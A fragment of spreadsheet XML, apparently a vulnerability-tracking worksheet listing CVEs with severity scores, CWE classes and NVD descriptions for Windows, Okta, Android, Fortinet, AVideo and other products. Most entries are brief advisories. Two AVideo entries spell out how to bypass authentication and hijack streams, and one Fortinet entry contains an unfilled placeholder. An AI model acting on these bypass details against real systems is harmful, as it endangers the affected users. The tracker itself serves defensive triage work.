          <t>NVD</t>
        </is>
      </c>
      <c r="O353" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P353" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q353" s="5" t="inlineStr"/>
      <c r="R353" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S353" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78444</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78449</t>
        </is>
      </c>
      <c r="D354" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E354" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F354" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I354" s="5" t="inlineStr"/>
      <c r="J354" s="5" t="inlineStr"/>
      <c r="K354" s="5" t="inlineStr"/>
      <c r="L354" s="5" t="inlineStr"/>
      <c r="M354" s="5" t="inlineStr"/>
      <c r="N354" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O354" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P354" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q354" s="5" t="inlineStr"/>
      <c r="R354" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S354" s="5" t="inlineStr">
        <is>
          <t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78449</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78450</t>
        </is>
      </c>
      <c r="D355" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E355" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F355" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I355" s="5" t="inlineStr"/>
      <c r="J355" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K355" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L355" s="5" t="inlineStr"/>
      <c r="M355" s="5" t="inlineStr"/>
      <c r="N355" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O355" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P355" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q355" s="5" t="inlineStr"/>
      <c r="R355" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S355" s="5" t="inlineStr">
        <is>
          <t>Use after free in Reliable Multicast Transport Driver (RMCAST) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78450</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78626</t>
        </is>
      </c>
      <c r="D356" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E356" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F356" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I356" s="5" t="inlineStr"/>
      <c r="J356" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K356" s="5" t="inlineStr"/>
      <c r="L356" s="5" t="inlineStr"/>
      <c r="M356" s="5" t="inlineStr"/>
      <c r="N356" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O356" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P356" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q356" s="5" t="inlineStr"/>
      <c r="R356" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S356" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway improperly handles input sanitization and regular expression evaluation within its Protected Rule authorization check, resulting in an authorization bypass when an administrator has explicitly configured a Protected Rule policy on one or more application resources.</t>
        </is>
      </c>
      <c r="T356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78626</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82066</t>
        </is>
      </c>
      <c r="D357" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E357" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G357" s="5" t="inlineStr"/>
      <c r="H357" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I357" s="5" t="inlineStr"/>
      <c r="J357" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K357" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L357" s="5" t="inlineStr"/>
      <c r="M357" s="5" t="inlineStr"/>
      <c r="N357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O357" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P357" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q357" s="5" t="inlineStr"/>
      <c r="R357" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S357" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82066</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83527</t>
        </is>
      </c>
      <c r="D358" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E358" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F358" s="5" t="inlineStr">
        <is>
          <t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t>
        </is>
      </c>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="n">
        <v>0.015</v>
      </c>
      <c r="I358" s="5" t="inlineStr"/>
      <c r="J358" s="5" t="inlineStr"/>
      <c r="K358" s="5" t="inlineStr"/>
      <c r="L358" s="5" t="inlineStr"/>
      <c r="M358" s="5" t="inlineStr"/>
      <c r="N358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O358" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P358" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q358" s="5" t="inlineStr"/>
      <c r="R358" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="S358" s="5" t="inlineStr">
        <is>
          <t>An Authentication Bypass vulnerability in Sentry before R10.8.2, R10.7.3 and R10.6.4 allows a remote unauthenticated attacker to gain administrative level access.</t>
        </is>
      </c>
      <c r="T358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83527</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83997</t>
        </is>
      </c>
      <c r="D359" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E359" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F359" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I359" s="5" t="inlineStr"/>
      <c r="J359" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K359" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L359" s="5" t="inlineStr"/>
      <c r="M359" s="5" t="inlineStr"/>
      <c r="N359" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O359" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P359" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q359" s="5" t="inlineStr"/>
      <c r="R359" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S359" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83997</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84393</t>
        </is>
      </c>
      <c r="D360" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E360" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F360" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I360" s="5" t="inlineStr"/>
      <c r="J360" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K360" s="5" t="inlineStr"/>
      <c r="L360" s="5" t="inlineStr"/>
      <c r="M360" s="5" t="inlineStr"/>
      <c r="N360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O360" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P360" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q360" s="5" t="inlineStr"/>
      <c r="R360" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="S360" s="5" t="inlineStr">
        <is>
          <t>A improper validation of certificate with host mismatch vulnerability in Fortinet FortiOS 7.6.1 through 7.6.6, FortiProxy 7.6.2 through 7.6.6 may allow attacker to information disclosure via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="T360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84393</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86720</t>
        </is>
      </c>
      <c r="D361" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E361" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G361" s="5" t="inlineStr"/>
      <c r="H361" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I361" s="5" t="inlineStr"/>
      <c r="J361" s="5" t="inlineStr"/>
      <c r="K361" s="5" t="inlineStr"/>
      <c r="L361" s="5" t="inlineStr"/>
      <c r="M361" s="5" t="inlineStr"/>
      <c r="N361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O361" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P361" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q361" s="5" t="inlineStr"/>
      <c r="R361" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S361" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 fails to validate ownership of live_restreams_id in resendRestreamer.json.php, allowing authenticated users with canStream to access other users' restream destinations. Attackers can broadcast their live stream to victim-configured restream destinations by supplying arbitrary live_restreams_id values, hijacking YouTube, Facebook, or Twitch streams using victim stream keys.</t>
        </is>
      </c>
      <c r="T361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86720</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86723</t>
        </is>
      </c>
      <c r="D362" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E362" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G362" s="5" t="inlineStr"/>
      <c r="H362" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I362" s="5" t="inlineStr"/>
      <c r="J362" s="5" t="inlineStr"/>
      <c r="K362" s="5" t="inlineStr"/>
      <c r="L362" s="5" t="inlineStr"/>
      <c r="M362" s="5" t="inlineStr"/>
      <c r="N362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O362" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P362" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q362" s="5" t="inlineStr"/>
      <c r="R362" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S362" s="5" t="inlineStr">
        <is>
          <t>AVideo through c3edcc274c389816d434acadac07ee78eaf330c1 contains an authentication bypass vulnerability in LoginControl::verifyChallenge() that uses loose comparison (==) instead of strict comparison (===) against unset session values. Attackers with only a password can submit an empty request to verifyChallenge.json.php to bypass PGP two-factor authentication and gain full authenticated access.</t>
        </is>
      </c>
      <c r="T362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86723</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28662</t>
        </is>
      </c>
      <c r="D363" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E363" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F363" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I363" s="5" t="inlineStr"/>
      <c r="J363" s="5" t="inlineStr"/>
      <c r="K363" s="5" t="inlineStr">
        <is>
          <t>google:android</t>
        </is>
      </c>
      <c r="L363" s="5" t="inlineStr"/>
      <c r="M363" s="5" t="inlineStr"/>
      <c r="N363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O363" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P363" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q363" s="5" t="inlineStr"/>
      <c r="R363" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="S363" s="5" t="inlineStr">
        <is>
          <t>In p2p_process_prov_disc_bootstrap_req of p2p_pd.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28662</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55277</t>
        </is>
      </c>
      <c r="D364" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E364" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F364" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I364" s="5" t="inlineStr"/>
      <c r="J364" s="5" t="inlineStr"/>
      <c r="K364" s="5" t="inlineStr"/>
      <c r="L364" s="5" t="inlineStr"/>
      <c r="M364" s="5" t="inlineStr"/>
      <c r="N364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O364" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P364" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q364" s="5" t="inlineStr"/>
      <c r="R364" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="S364" s="5" t="inlineStr">
        <is>
          <t>In checkUiccListenConfigNeeded of RoutingManager.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55277</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68827</t>
        </is>
      </c>
      <c r="D365" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E365" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F365" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I365" s="5" t="inlineStr"/>
      <c r="J365" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K36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65" s="5" t="inlineStr"/>
      <c r="M365" s="5" t="inlineStr"/>
      <c r="N365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O365" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P365" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q365" s="5" t="inlineStr"/>
      <c r="R365" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="S365" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows GDI+ allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68827</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68834</t>
        </is>
      </c>
      <c r="D366" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E366" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F366" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I366" s="5" t="inlineStr"/>
      <c r="J366" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K36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66" s="5" t="inlineStr"/>
      <c r="M366" s="5" t="inlineStr"/>
      <c r="N366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O366" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P366" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q366" s="5" t="inlineStr"/>
      <c r="R366" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S366" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68834</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68838</t>
        </is>
      </c>
      <c r="D367" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E367" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F367" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I367" s="5" t="inlineStr"/>
      <c r="J367" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K36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67" s="5" t="inlineStr"/>
      <c r="M367" s="5" t="inlineStr"/>
      <c r="N367" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O367" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P367" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q367" s="5" t="inlineStr"/>
      <c r="R367" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S367" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68838</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68876</t>
        </is>
      </c>
      <c r="D368" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E368" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F368" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I368" s="5" t="inlineStr"/>
      <c r="J368" s="5" t="inlineStr"/>
      <c r="K368" s="5" t="inlineStr"/>
      <c r="L368" s="5" t="inlineStr"/>
      <c r="M368" s="5" t="inlineStr"/>
      <c r="N368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O368" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P368" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q368" s="5" t="inlineStr"/>
      <c r="R368" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S368" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68876</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68878</t>
        </is>
      </c>
      <c r="D369" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E369" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F369" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G369" s="5" t="inlineStr"/>
      <c r="H369" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I369" s="5" t="inlineStr"/>
      <c r="J369" s="5" t="inlineStr"/>
      <c r="K369" s="5" t="inlineStr"/>
      <c r="L369" s="5" t="inlineStr"/>
      <c r="M369" s="5" t="inlineStr"/>
      <c r="N369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O369" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P369" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q369" s="5" t="inlineStr"/>
      <c r="R369" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S369" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Fast FAT Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68878</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68880</t>
        </is>
      </c>
      <c r="D370" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E370" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F370" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
